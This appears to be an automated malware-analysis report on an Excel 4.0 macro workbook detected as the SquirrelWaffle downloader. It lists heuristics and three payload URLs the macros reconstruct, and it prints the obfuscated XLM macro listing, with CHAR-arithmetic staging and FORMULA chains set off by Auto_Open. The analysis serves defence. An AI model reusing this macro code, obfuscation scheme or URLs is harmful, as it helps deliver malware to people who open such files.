Verdict: MALICIOUS
Risk Score: 302

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
The file contains Excel 4.0 macros, including an Auto_Open defined name, which is a strong indicator of malicious intent. The macros reconstruct and reference three URLs, likely to download and execute a second-stage payload. ClamAV also identified the file as Xls.Downloader.SquirrelWaffle, supporting the downloader classification.
Heuristics (7)

- ClamAV: Xls.Downloader.SquirrelWaffle1021-9903731-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Downloader.SquirrelWaffle1021-9903731-0
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- URL reconstructed from XLM cell array, 3 URLs (critical, OLE_XLM_CELL_ARRAY_URL): Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://dharmasasthatrust.com/cEJYcStqlAf/hr.html (referenced by macro)
  - https://shalsa3d.com/UGqWNCLT/hr.html (referenced by macro)
  - https://haroldhallroofing.net/pAz8O63Gn/hr.html (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 8702 bytes |

SHA-256: e515aea77033b51661d68793c809b89632ac2f97755cd11b999a378d8e47fb92
Preview script: first 1,000 lines of the extracted script
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - HB
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Symmm
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Syym
' 0085 10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - R
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Syyb
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Syyb
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Syyb
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Syyb
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.CONCAT hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d HB!D1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' Symmm,Q1,CHAR(102/2),""
' Symmm,E2,CHAR(216/2),""
' Symmm,K2,CHAR(35*2),""
' Symmm,S2,CHAR(100-35),""
' Symmm,B3,CHAR(236-118),""
' Symmm,I3,CHAR(238/2),""
' Symmm,O3,CHAR(134/2),""
' Symmm,U3,"",5.00000000000000000000
' Symmm,A4,CHAR(228/2),""
' Symmm,M4,CHAR(148/2),""
' Symmm,Q4,"",1.00000000000000000000
' Symmm,T4,CHAR(42*2),""
' Symmm,J5,CHAR(52*2),""
' Symmm,S5,CHAR(100/2),""
' Symmm,D6,CHAR(185-110),""
' Symmm,Q6,CHAR(220-111),""
' Symmm,L7,CHAR(170/2),""
' Symmm,V7,CHAR(224/2),""
' Symmm,G8,CHAR(109-40),""
' Symmm,M8,CHAR(200-100),""
' Symmm,P8,CHAR(232/2),""
' Symmm,T9,CHAR(194/2),""
' Symmm,F10,CHAR(203-102),""
' Symmm,K10,CHAR(164-82),""
' Symmm,B11,CHAR(220/2),""
' Symmm,O11,CHAR(96/2),""
' Symmm,Q11,CHAR(136/2),""
' Symmm,H13,CHAR(166/2),""
' Symmm,L13,CHAR(33*2),""
' Symmm,S13,CHAR(210/2),""
' Symmm,E14,CHAR(240-120),""
' Symmm,N14,CHAR(217-100),""
' Symmm,P15,CHAR(202-103),""
' Symmm,C16,CHAR(206-103),""
' Symmm,M16,CHAR(152-76),""
' Symmm,T16,CHAR(242/2),""
' Symmm,R17,CHAR(212-101),""
' Symmm,O18,CHAR(230/2),""
' Symmm,U21,"",1.00000000000000000000
' Symmm,O50,_xlfn.ARABIC("CI"),""
' Symmm,F52,_xlfn.ARABIC("CXI"),""
' Symmm,T52,_xlfn.ARABIC("LXXVI"),""
' Syym,M1,_xlfn.CONCAT( R!O11),""
' Syym,I3,"_xlfn.CONCAT( R!J41, R!H13, R!J5)",""
' Syym,O3,"_xlfn.CONCAT( R!J41, R!D6, R!F10, R!A4, R!B11, R!F10, R!E2, R!Q1, R!S5, R!J41, R!J43)",""
' Syym,F4,"_xlfn.CONCAT( R!J41, R!M4, R!M4, R!O3, R!O3, R!O3, R!M4, R!M4, R!J41, R!J43)",""
' Syym,S5,"_xlfn.CONCAT( R!J41, R!M4, R!O3, R!M4, R!J41, R!J43)",""
' Syym,R7,"_xlfn.CONCAT( R!O11, R!J43)",""
' Syym,C8,"_xlfn.CONCAT( R!J41, R!R17, R!V7, R!F10, R!B11, R!J41, R!J43)",""
' Syym,H9,"_xlfn.CONCAT( R!E2, R!E2, R!Q1, R!S5, R!J41, R!J43)",""
' Syym,L10,"_xlfn.CONCAT( R!J41, R!N14, R!A4, R!E2, R!Q6, R!R17, R!B11, R!J41, R!J43)",""
' Syym,Q11,"_xlfn.CONCAT( R!J41, R!O3, R!A4, R!F10, R!T9, R!P8, R!F10, R!Q11, R!S13, R!A4, R!F10, R!P15, R!P8, R!R17, R!A4, R!T16, R!S2, R!J41, R!J43)",""
' Syym,W11,_xlfn.CONCAT( Shee!Y21),""
' Syym,J12,"_xlfn.CONCAT( R!J41, R!M4, R!M4, R!O3, R!O3, R!L13, R!L13, R!J41, R!J43)",""
' Syym,D13,"_xlfn.CONCAT( R!J41, R!H13, R!J5, R!F10, R!E2, R!E2, R!G8, R!E14, R!F10, R!P15, R!N14, R!P8, R!F10, R!S2, R!J41, R!J43)",""
' Syym,Y13,"_xlfn.CONCAT( Shee!T51, Shee!N16, Shee!P20, Shee!K14, Shee!L21, Shee!P20, Shee!O12, Shee!BA11, Shee!BC15, Shee!T51, Shee!T53)",""
' Syym,O14,"_xlfn.CONCAT( R!J41, R!O3, R!L41, R!L43, R!Q11, R!T9, R!P8, R!R17, R!V7, R!J41, R!J43)",""
' Syym,K15,"_xlfn.CONCAT( R!S2, R!J41, R!J43)",""
' Syym,R17,"_xlfn.CONCAT( R!J41, R!L7, R!K10, R!M16, R!Q11, R!R17, R!I3, R!B11, R!E2, R!R17, R!T9, R!M8, R!T4)",""
' Syym,BB17,"_xlfn.CONCAT( Shee!Y21, Shee!T53)",""
' Syym,J19,"_xlfn.CONCAT( R!J41, R!O3, R!L41, R!L43, R!Q11, R!T9, R!P8, R!R17, R!V7, R!L43, R!P8, R!F10, R!O18, R!P8, R!L45, R!P8, R!F10, R!O18, R!P8, R!J41, R!J43)",""
' Syym,B21,"_xlfn.CONCAT( R!J41, R!A4)",""
' Syym,M21,_xlfn.CONCAT( R!U3),""
' Syym,BA21,"_xlfn.CONCAT( Shee!T51, Shee!Y13, Shee!K14, Shee!P20, Shee!BD19, Shee!Z18, Shee!P20, Shee!BA21, Shee!BC23, Shee!K14, Shee!P20, Shee!Z25, Shee!Z18, Shee!BB27, Shee!K14, Shee!BD26, Shee!BC12, Shee!T51, Shee!T53)",""
' Syym,P23,"_xlfn.CONCAT( R!J41, R!O3, R!L41, R!L43, R!Q11, R!T9, R!P8, R!R17, R!V7, R!L43, R!P8, R!F10, R!O18, R!P8, R!Q4, R!L45, R!P8, R!F10, R!O18, R!P8, R!J41, R!J43)",""
' Syym,C24,"_xlfn.CONCAT( R!K2, R!S13, R!E2)",""
' Syym,Y24,"_xlfn.CONCAT( Shee!T51, Shee!Y13, Shee!V51, Shee!V53, Shee!BA21, Shee!BD19, Shee!Z18, Shee!BB27, Shee!BF17, Shee!T51, Shee!T53)",""
' Syym,F25,"_xlfn.CONCAT( R!C16, R!O18, R!B3, R!A4, R!Q1, R!S5, R!J41, R!J43)",""
' Syym,D27,"_xlfn.CONCAT( R!J41, R!O3, R!L41, R!L43, R!Q11, R!T9, R!P8, R!R17, R!V7, R!L43, R!P8, R!F10, R!O18, R!P8, R!S5, R!L45, R!P8, R!F10, R!O18, R!P8, R!J41, R!J43)",""
' Syym,W31,_xlfn.CONCAT( Shee!BE13),""
' Syym,BC32,"_xlfn.CONCAT( Shee!T51, Shee!Y13, Shee!V51, Shee!V53, Shee!BA21, Shee!BD19, Shee!Z18, Shee!BB27, Shee!BF17, Shee!V53, Shee!Z18, Shee!P20, Shee!Y28, Shee!Z18, Shee!BE31, Shee!V55, Shee!Z18, Shee!P20, Shee!Y28, Shee!Z18, Shee!T51, Shee!T53)",""
' R,D12,"FORMULA( Syyb!E14, Syyb!B23)=FORMULA( Syyb!F14, Syyb!J6)=FORMULA( Syyb!I12, Syyb!D4)=FORMULA( Symmm!O3, Syym!F13)=FORMULA( Symmm!Q11, Syym!F14)=FORMULA.FILL( Symmm!S5, Syym!F15)=FORMULA.FILL( Symmm!R17& Syyb!B23& Symmm!C24& Syyb!J6& Symmm!K15, Syym!F19)=FORMULA.FILL( Symmm!O14, Syym!F16)=FORMULA( Symmm!M1, Syym!F17)=FORMULA( Symmm!L10, Syym!F18)=FORMULA.FILL( Symmm!J12, Syym!F20)=FORMULA( Symmm!R7, Syym!F21)=FORMULA( Symmm!J19, Syym!F22)=FORMULA( Symmm!I3& Syyb!J6& Symmm!H9, Syym!F23)=FORMULA( Symmm!D13, Syym!F24)=FORMULA( Symmm!F4, Syym!F25)=FORMULA( Symmm!C8, Syym!F26)=FORMULA( Symmm!B21& Syyb!J6& Symmm!F25, Syym!F27)=FORMULA( Symmm!M21, Syym!F28)=FORMULA( Symmm!P23, Syym!F30)=FORMULA( Symmm!D27, Syym!F32)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F13& Syym!F14& Syym!F15& Syym!F16& Syym!F17& R!I70, HB!D17)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F18& Syym!F19& Syym!F20& Syym!F21& Symmm!G31& Syym!F22& Syym!F21& Syym!F17& R!I70, HB!D19)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F18& Syym!F19& Syym!F20& Syym!F21& Symmm!G33& Syym!F30& Syym!F21& Syym!F17& R!I70, HB!D22)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F18& Syym!F19& Syym!F20& Syym!F21& Symmm!G35& Syym!F32& Syym!F21& Syym!F17& R!I70, HB!D24)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F23& Syym!F24& Syym!F25& Syym!F21& Syym!F26& Syym!F27& Syym!F22& Syym!F21& Syym!F28& R!I70, HB!D26)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F23& Syym!F24& Syym!F25& Syym!F21& Syym!F26& Syym!F27& Syym!F30& Syym!F21& Syym!F28& R!I70, HB!D28)=FORMULA( R!I63& R!I65& R!I66& Syyb!D4& Syyb!D4& R!I69& Syym!F23& Syym!F24& Syym!F25& Syym!F21& Syym!F26& Syym!F27& Syym!F32& Syym!F21& Syym!F28& R!I70, HB!D30)",""
' Syyb,E14,CHAR( R!F52),""
' Syyb,F14,CHAR( R!O50),""
' Syyb,I12,CHAR( R!T52),""